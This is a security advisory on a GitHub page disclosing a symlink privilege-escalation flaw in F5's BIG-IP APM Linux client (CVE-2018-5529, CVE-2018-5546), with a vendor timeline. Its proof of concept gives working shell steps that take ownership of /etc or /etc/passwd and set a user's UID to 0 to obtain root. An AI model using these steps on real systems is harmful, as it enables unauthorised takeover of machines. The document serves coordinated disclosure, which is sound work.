Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/F5/CVE-2018-5529.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
251 lines (179 sloc)
9.24 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: F5 BIG-IP APM client for Linux and macOS vulnerability | |
| Author: Rich Mirch | |
| CVE: CVE-2018-5529 (incomplete fix), CVE-2018-5546 | |
| Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529) | |
| https://support.f5.com/csp/article/K54431371 (CVE-2018-5546) | |
| Description | |
| The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package | |
| changes the ownership and permissions of several files and directories | |
| under $HOME/.F5Networks which allows local unprivileged users to obtain | |
| ownership of arbitrary files via vectors involving creation of a directory | |
| and a file under that directory, and later replacing that directory or | |
| file with a symlink. | |
| Notes: | |
| 1. PoC provided for Linux however macOS is also vulnerable. The svpn binary | |
| is named differently and stored in a different directory on macOS. | |
| 2. The policyserver component is also vulnerable to a similar attack against | |
| the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C | |
| Base: 7.8 | |
| Temporal: 7.0 | |
| Test Environment | |
| OS: CentOS 64-bit release 6.9 (latest patches as of 2018-04-12) | |
| Kernel: 2.6.32-696.23.1.el6.x86_64 | |
| ISO: apmclients-7160.2018.118.2335-4172.0.iso | |
| Proof Of Concept | |
| Two distinct arbitrary file takeover vulnerabilities exist in the | |
| /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary which is setuid root. | |
| 1. Privileges are not dropped prior to chown()/chmod() of the | |
| $HOME/.F5Networks directory. | |
| 2. Privileges are not dropped prior to chown()/chmod() of the | |
| $HOME/.F5Networks/svpn.log file. | |
| Note: A low privileged account named user1 is used for all test cases. | |
| [user1@localhost ~]$ id | |
| uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0- | |
| s0:c0.c1023 | |
| ################################################################################ | |
| # Test case 1 - take ownership of a directory | |
| # /etc via $HOME/.F5Networks | |
| ################################################################################ | |
| [Step 1] Create a symlink from /etc to $HOME/.F5Networks | |
| [user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks | |
| [user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks | |
| drwxr-xr-x. 64 root root 4096 Apr 12 19:29 /etc | |
| lrwxrwxrwx. 1 user1 user1 4 Apr 12 19:38 /home/user1/.F5Networks -> /etc | |
| [Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 | |
| [user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 | |
| [Step 3] Show that user1 is now the owner of /etc. | |
| [user1@localhost ~]$ ls -ld /etc | |
| drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc | |
| [Step 4] Modify /etc/passwd and change UID/GID to 0 for user1. | |
| [user1@localhost ~]$ cd /etc | |
| [user1@localhost etc]$ mv passwd passwd.old | |
| [user1@localhost etc]$ cp passwd.old passwd | |
| [user1@localhost etc]$ ls -ld /etc/passwd | |
| -rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd | |
| [user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd | |
| [user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd | |
| --- /etc/passwd.orig 2018-04-12 19:40:02.132987696 -0500 | |
| +++ /etc/passwd 2018-04-12 19:41:15.484988778 -0500 | |
| @@ -18,4 +18,4 @@ | |
| postfix:x:89:89::/var/spool/postfix:/sbin/nologin | |
| sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin | |
| ntp:x:38:38::/etc/ntp:/sbin/nologin | |
| -user1:x:500:500::/home/user1:/bin/bash | |
| +user1:x:0:0::/home/user1:/bin/bash | |
| [Step 5] Execute /bin/su - user1 and become root. | |
| [user1@localhost etc]$ /bin/su - user1 | |
| Password: | |
| [root@localhost ~]# id | |
| uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 | |
| ################################################################################ | |
| # Test case 2 - take ownership of a file | |
| # /etc/passwd via $HOME/.F5Networks/svpn.log | |
| ################################################################################ | |
| [Step 1] Create $HOME/.F5Networks. | |
| [user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks | |
| [Step 2] Display permissions of /etc/passwd and attempt to write to it. | |
| [user1@localhost ~]$ ls -ld /etc /etc/passwd | |
| drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc | |
| -rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd | |
| [user1@localhost ~]$ echo test> /etc/passwd | |
| -bash: /etc/passwd: Permission denied | |
| [user1@localhost ~]$ | |
| [Step 3] Create a symlink from /etc/passwd to /home/user1/.F5Networks/svpn.log. | |
| [user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log | |
| [user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd | |
| -rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd | |
| lrwxrwxrwx. 1 user1 user1 11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd | |
| [Step 4] Backup /etc/passwd. | |
| [user1@localhost ~]$ cp -p /etc/passwd passwd.orig | |
| [Step 5] Display contents of /etc/passwd. | |
| [user1@localhost ~]$ cat /etc/passwd | |
| root:x:0:0:root:/root:/bin/bash | |
| bin:x:1:1:bin:/bin:/sbin/nologin | |
| daemon:x:2:2:daemon:/sbin:/sbin/nologin | |
| adm:x:3:4:adm:/var/adm:/sbin/nologin | |
| lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | |
| sync:x:5:0:sync:/sbin:/bin/sync | |
| shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown | |
| halt:x:7:0:halt:/sbin:/sbin/halt | |
| mail:x:8:12:mail:/var/spool/mail:/sbin/nologin | |
| uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin | |
| operator:x:11:0:operator:/root:/sbin/nologin | |
| games:x:12:100:games:/usr/games:/sbin/nologin | |
| gopher:x:13:30:gopher:/var/gopher:/sbin/nologin | |
| ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin | |
| nobody:x:99:99:Nobody:/:/sbin/nologin | |
| vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin | |
| saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin | |
| postfix:x:89:89::/var/spool/postfix:/sbin/nologin | |
| sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin | |
| ntp:x:38:38::/etc/ntp:/sbin/nologin | |
| user1:x:500:500::/home/user1:/bin/bash | |
| [Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is | |
| now the owner of /etc/passwd. | |
| [user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 | |
| [user1@localhost ~]$ ls -ld /etc/passwd | |
| -rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd | |
| [Step 7] Display contents of /etc/passwd. Notice the log file is appended to the file. | |
| [user1@localhost ~]$ cat /etc/passwd | |
| root:x:0:0:root:/root:/bin/bash | |
| bin:x:1:1:bin:/bin:/sbin/nologin | |
| daemon:x:2:2:daemon:/sbin:/sbin/nologin | |
| adm:x:3:4:adm:/var/adm:/sbin/nologin | |
| lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | |
| sync:x:5:0:sync:/sbin:/bin/sync | |
| shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown | |
| halt:x:7:0:halt:/sbin:/sbin/halt | |
| mail:x:8:12:mail:/var/spool/mail:/sbin/nologin | |
| uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin | |
| operator:x:11:0:operator:/root:/sbin/nologin | |
| games:x:12:100:games:/usr/games:/sbin/nologin | |
| gopher:x:13:30:gopher:/var/gopher:/sbin/nologin | |
| ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin | |
| nobody:x:99:99:Nobody:/:/sbin/nologin | |
| vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin | |
| saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin | |
| postfix:x:89:89::/var/spool/postfix:/sbin/nologin | |
| sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin | |
| ntp:x:38:38::/etc/ntp:/sbin/nologin | |
| user1:x:500:500::/home/user1:/bin/bash | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, ===================================== | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Version: "7160.2018.0118.1" | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Locale: C | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, ===================================== | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63 | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------, | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500 | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500 | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0 | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500 | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1 | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1 | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------, | |
| 2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00 | |
| 2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed | |
| out | |
| 2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed | |
| [Step 8] Create a new /etc/passwd file and change UID and GID to 0. | |
| [user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd | |
| [Step 9] Execute /bin/su - user1 and become root. | |
| [user1@localhost ~]$ su - user1 | |
| Password: | |
| [root@localhost ~]# id | |
| uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 | |
| [root@localhost ~]# | |
| Timeline: | |
| 2018-04-16: Reported to vendor | |
| 2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review | |
| 2018-04-25: Vendor confirmed vulnerability and requested embargo | |
| 2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529 | |
| 2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue | |
| 2018-07-17: Vendor acknowledged receipt of the incomplete fix report | |
| 2018-07-17: Vendor confirmed vulnerability | |
| 2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546 | |